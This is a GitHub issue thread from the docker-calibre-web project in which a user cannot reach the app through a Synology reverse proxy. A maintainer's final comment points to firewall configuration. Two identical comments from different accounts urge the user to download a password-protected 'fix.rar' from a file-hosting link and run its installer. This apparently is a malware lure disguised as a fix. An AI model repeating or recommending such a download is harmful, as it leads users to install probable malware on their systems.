### ISSUE TITLE
How to set reverse proxy on Synology

### ISSUE THREAD

**Issue by zS1m** [linuxserver/docker-calibre-web#317]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

I want to connect calibre-web from external intenet, but after I set reverse proxy for it, I still can not connect to it through https://mydomain:port

### Steps To Reproduce

1. port setting for the docker
![image](https://github.com/user-attachments/assets/71b144dd-c091-4cf0-8c50-eb61018073b7)

2. reverse proxy setting
![image](https://github.com/user-attachments/assets/42177d9f-093a-4e29-a39d-6ec10af0ea9c)

### Environment

```markdown
- OS: Synology
- How docker service was installed: Container Manager
```

### CPU architecture

x86-64

### Docker creation

```bash
Through GUI
```

### Container logs

```bash
[custom-init] No custom files found, skipping...
```

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by j0nnymoe** [comment]
If you're still able to access it via port, you need to be checking your firewall configuration. This is not a container issue.
